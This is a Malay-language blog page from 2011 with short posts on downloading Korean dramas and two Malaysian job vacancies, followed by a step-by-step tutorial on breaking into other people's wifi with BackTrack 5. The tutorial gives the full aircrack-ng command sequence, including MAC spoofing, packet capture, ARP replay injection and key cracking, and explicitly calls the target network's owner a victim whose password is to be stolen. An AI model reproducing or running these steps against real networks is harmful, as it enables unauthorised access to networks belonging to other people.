Thursday, October 27, 2011

Website untuk download drama Korea


Ramai yang tanya kat mana nak download kdrama dengan asian movie/drama yang lain. Kalau nak beli macam mampu plak kan? Jadi solution dia ialah DOWNLOAD atau tengok secara online je lah. Aku lebih prefer download sebenarnya. Kalau nak tengok online ni azab betul nak buffer satu part by satu part. Tapi ikut selera masing masing. Kalau rasa rasa internet laju nak mati boleh lah buffer laju laju kan. hehe.

Antara beberapa website yang provide download link yang aku dah cuba sendiri sepanjang menjadi pengemar download drama Asia ni. Eh tak ada lah tegar sangat hihi.

Selamat men'DOWNLOAD' yea.....hehehehe
»» Readmore

Wednesday, October 26, 2011

Jawatan Kosong di Universiti Sains Islam Malaysia (USIM)



Permohonan adalah dipelawa daripada warganegara Malaysia untuk mengisi kekosongan jawatan berikut :-

1. Pembantu Pengawas Peperiksaan

Klik Di Sini Untuk Maklumat Lanjut………..
»» Readmore

Jawatan Kosong di Institut Perubatan Molekul UKM (UMBI)



Projek The Malaysian Cohort yang berurusetia di Institut Perubatan Molekul UKM (UMBI) merupakan satu projek penyelidikan kebangsaan yang telah diluluskan oleh Kabinet dan ditaja sepenuhnya oleh Kementerian Sains, Teknologi dan Inovasi (MOSTI). Kami menjemput anda WARGANEGARA MALAYSIABERUMUR 18 TAHUN DAN KE ATAS yang berkelayakan untuk mengisi kekosongan jawatan berikut.

- Penolong Pegawai Sains (C27)


Klik Di Sini Untuk Maklumat Lanjut………..
»» Readmore

Cara untuk hack wifi orang dengan BackTrack 5



Sebelum ini ada user di sini posting macam mana nak hack wifi dengan backtrack tetapi dengan versi BT yang dahulu. Kali ini, saya akan posting pasal bagaimana nak hack wifi orang dengan mendapatkan kunci akses wifi tersebut dengan menggunakan BackTrack 5. 

1. Anda boleh dapatkan salinan linux backtrack percuma melalui website BT dan muat turun versi samada 32-bit ataupun 64-bit dengan perisa antaramuka KDE ataupun Gnome.( klik sini )

*pastikan download yg nie dahulu...( klik sini ).lepas siap install,baru download yang atas yea.....

2. Selepas anda muat turun, burn salinan iso dalam dvd ataupun jadikan pendrive anda sebagai backtrack live usb. Rujuk panduan dalam website BT untuk membuat linux live usb.

3. Restart PC anda dan masukkan dvd/usb backtrack dan jika pc bios anda mempunyai boot selection, sila tekan butang keyboard untuk arahan masuk ke boot selection. Cth, F11 untuk ke boot selection. Dalam boot selection pula, sila tekan pada opsyen dvd/usb boot dan tunggu sehingga muncul "boot:" dan tekan enter.

4. Kemudian, pilihan untuk boot BT melalui pelbagai cara, memtest dan juga install BT akan muncul di skrin dan jika mahu boot dari cd, pilih antara opsyen "backtrack text boot" (yang atas sekali) dan juga backtrack stealth. Ia akan ambil masa selama 4-5 minit jadi sila bersabar. Kemudian tulis "startx" untuk boot GUI.

5. Apabila BT sudah boot up, sila pergi ke konsole /terminal (ikon berupa command prompt) dan anda perlu menulis pelbagai sintaks arahan untuk meng'hack' wifi orang.

6. Dalam konsole/terminal, tulis arahan untuk mendapatkan senarai antaramuka network: 


Code:

airmon-ng


Dan ia akan menunjukkan senarai antaramuka rangkaian dan biasanya wlan0.

7. Kemudia, jalankan arahan seperti berikut:

Code:

airmon-ng stop (antaramuka) 
ifconfig (antaramuka) down 
macchanger --mac 00:11:22:33:44:55 (antaramuka) 
airmon-ng start (antaramuka)


Jika proses ini gagal, bermakna ada terdapat kesalahan dalam sintaks arahan tersebut.

8. Untuk melihat senarai wifi yang aktif, tulis arahan spt berikut:


Code:

airodump-ng (antaramuka)


dan anda dapat melihat senarai wifi yang aktif di sekitar anda. Kemudia, tekan ctrl+c dan pilihlah mana-mana wifi milik orang untuk mencuri kata laluan wifi orang.

9. Kemudian tulis arahan ini untuk mendapatkan info tentang wifi milik orang:


Code:


airodump-ng -c (channel) -w (nama wifi) --bssid (bssid) (antaramuka)

Dalam sintaks tersebut, (channel) merupakan kod channel, ch yang digunakan oleh wifi mangsa dan bssid ialah kod wifi mangsa yang ada di sebelah kiri. Contoh bssid: 00:1F:FB:2A:C3:56.

10. Buka konsole/terminal yang baru tanpa menutup konsole/terminal yang terdahulu dan kemudian arahan macam ini:


Code:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid/ nama wifi) (antaramuka)

Tunggu sehingga muncul "Association succesful" dengan tanda smiley.

11. Ha.....nak dekat dah...sekarang inilah masanya untuk yang ini dan tulis seperti ini:


Code:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (antaramuka)

Dalam proses ini, anda hanya perlu berehat sebentar selepas menjalankan arahan seperti ini. Ini kerana ia akan ambil masa selama 2-3 minit untuk mengumpul data yang cukup untuk mencuri katalaluan wifi orang. Perhatikan pada #Data pada salah satu daripada tetingkap konsole/terminal dan apabila mencapai sebanyak 30000 atau lebih, terus tekan ctrl+c untuk berhenti.

12. Selepas proses kumpul data selesai, buka tetingkap konsole/terminal yang baru dan tulis seperti ini:


Code:

aircrack-ng -w /root/desktop/test.lst (nama wifi-01.cap)

Jika anda tidak mempunyai data yang mencukupi, aircrack memberitahu anda supaya cuba sekali lagi dan apabila berjaya, kata "KEY FOUND" muncul dan di sebelah itu adalah katalaluan bagi wifi mangsa. 

13. Untuk menguji akses ke wifi orang, anda perlu shutdown BT dan boot windows dan cuba isikan katalaluan tanpa meletakkan simbol '[', ']' dan ':'. Bagi pengguna yang mahu untuk keluar dari BT, tekan butang naga (start) dan pilih "log out" dan ia akan kembali ke command prompt sejak anda menulis "startx' di situ dan untuk sintaks shutdown spt berikut:

Code:
shutdown (opsyen) (masa)
bagi mereka yang tidak tahu bagaimana untuk membuat ini, tapikan shutdown --help dan lihat pada senarainya. 

Untuk restart, taipkan:

Code:
shutdown -r now
Untuk keluar terus tanpa restart, taipkan:

Code:
shutdown -P now
Selamat mencuba...
»» Readmore
Related Posts Plugin for WordPress, Blogger...